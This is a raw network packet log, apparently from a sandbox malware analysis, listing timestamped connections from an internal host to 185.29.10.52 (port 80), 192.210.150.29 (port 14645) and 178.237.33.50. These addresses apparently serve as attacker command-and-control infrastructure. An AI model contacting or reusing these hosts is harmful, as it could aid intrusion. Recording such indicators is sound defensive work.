                        Sep 26, 2024 10:33:13.298065901 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298098087 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298106909 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298247099 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298276901 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298289061 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298322916 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298356056 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298369884 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298387051 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298418999 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298430920 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298453093 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298491001 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298502922 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298523903 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298553944 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298568964 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298677921 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298722982 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298727989 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298759937 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298791885 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298804998 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298824072 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298856974 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298870087 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298890114 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298923016 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298935890 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.298954964 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.298986912 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299000025 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.299019098 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299052000 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299063921 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.299083948 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299115896 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299129009 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.299149036 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299194098 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.299412966 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299448013 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299479961 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299495935 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.299513102 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.299557924 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300407887 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300440073 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300472975 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300486088 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300544977 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300576925 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300590038 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300610065 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300642967 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300653934 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300682068 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300714016 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300726891 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300792933 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300822973 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300841093 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300856113 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300888062 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300899982 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300919056 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300951004 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.300961971 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.300981998 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301026106 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301043034 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301104069 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301136017 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301150084 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301167965 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301201105 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301211119 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301393032 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301424026 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301434994 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301457882 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301490068 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301503897 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301521063 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301553011 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301565886 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301584959 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301616907 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301630020 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.301649094 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.301692963 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374560118 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374630928 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374665022 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374686003 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374697924 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374732971 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374742031 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374766111 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374797106 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374809027 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374847889 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374881029 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374886990 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374912977 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374944925 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.374957085 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.374979973 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:13.375026941 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:13.569717884 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:14.420844078 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:14.420928955 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:14.421458006 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:14.421503067 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:14.422621012 CEST8049163185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:14.422667027 CEST4916380192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:14.952769041 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:14.957674980 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:14.957762003 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:14.964587927 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:14.969443083 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.343950987 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.344425917 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.344466925 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.344510078 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.344598055 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.344680071 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.344731092 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.344961882 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.345012903 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.350964069 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.355874062 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.355942011 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.361290932 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.909518003 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:16.918107033 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:16.923064947 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:17.270879984 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:17.402571917 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:17.402646065 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:17.404889107 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:17.409790039 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:17.409843922 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:17.413351059 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:17.418173075 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:17.540021896 CEST4916680192.168.2.22178.237.33.50
                        Sep 26, 2024 10:33:17.544863939 CEST8049166178.237.33.50192.168.2.22
                        Sep 26, 2024 10:33:17.544923067 CEST4916680192.168.2.22178.237.33.50
                        Sep 26, 2024 10:33:17.545136929 CEST4916680192.168.2.22178.237.33.50
                        Sep 26, 2024 10:33:17.549947977 CEST8049166178.237.33.50192.168.2.22
                        Sep 26, 2024 10:33:17.925031900 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.064449072 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.064584017 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.068474054 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.073292971 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.073343992 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.078203917 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.153397083 CEST8049166178.237.33.50192.168.2.22
                        Sep 26, 2024 10:33:18.153482914 CEST4916680192.168.2.22178.237.33.50
                        Sep 26, 2024 10:33:18.159884930 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.164911032 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273025990 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273082018 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273114920 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273168087 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.273253918 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273286104 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273305893 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.273319006 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273363113 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.273370981 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273403883 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.273449898 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.274233103 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.274435043 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.274472952 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.274487972 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.274506092 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.274554014 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.278054953 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.365716934 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.365796089 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.365909100 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.365942001 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.365974903 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.365984917 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.366008043 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366053104 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.366056919 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366090059 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366121054 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366130114 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.366199970 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366231918 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366239071 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.366909981 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366955042 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.366961956 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.366993904 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367032051 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.367072105 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367105961 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367146015 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.367763996 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367815018 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367847919 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367852926 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.367937088 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367969036 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.367988110 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.368916988 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.370632887 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.370699883 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.370731115 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.370740891 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.370763063 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.370800972 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.376669884 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458184958 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458221912 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458255053 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458283901 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458345890 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458378077 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458389997 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458640099 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458681107 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458687067 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458729029 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458760977 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458770037 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458794117 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458825111 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458832979 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458857059 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458897114 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.458898067 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.458987951 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459031105 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459037066 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459068060 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459101915 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459224939 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459254980 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459286928 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459292889 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459319115 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459352016 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459357977 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459398985 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459431887 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459438086 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459465027 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459496021 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459496975 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459920883 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.459959030 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.459970951 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460004091 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460038900 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460107088 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460136890 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460167885 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460170984 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460201979 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460237980 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460345030 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460376978 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460408926 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460412025 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460439920 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460474014 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460474968 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460851908 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460886002 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.460901976 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460935116 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.460973978 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.461015940 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.461047888 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.461086988 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.461513042 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.463251114 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.463300943 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.463332891 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.463341951 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.463366032 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.463397980 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.463413000 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.466128111 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.550889969 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.550926924 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.550960064 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.550973892 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551022053 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551055908 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551064968 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551104069 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551135063 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551143885 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551170111 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551212072 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551250935 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551282883 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551315069 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551326990 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551347971 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551381111 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551422119 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551501989 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551534891 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551542997 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551567078 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551599979 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551608086 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551630974 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551662922 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551671028 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551695108 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551732063 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551819086 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551868916 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551901102 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551912069 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.551934004 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.551981926 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552009106 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.552014112 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552047014 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552051067 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.552162886 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552195072 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552196980 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.552309036 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552340984 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552344084 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.552372932 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552405119 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552412987 CEST4916514645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:33:18.552437067 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552470922 CEST1464549165192.210.150.29192.168.2.22
                        Sep 26, 2024 10:33:18.552475929 CEST4916514645192.168.2.22192.210.150.29
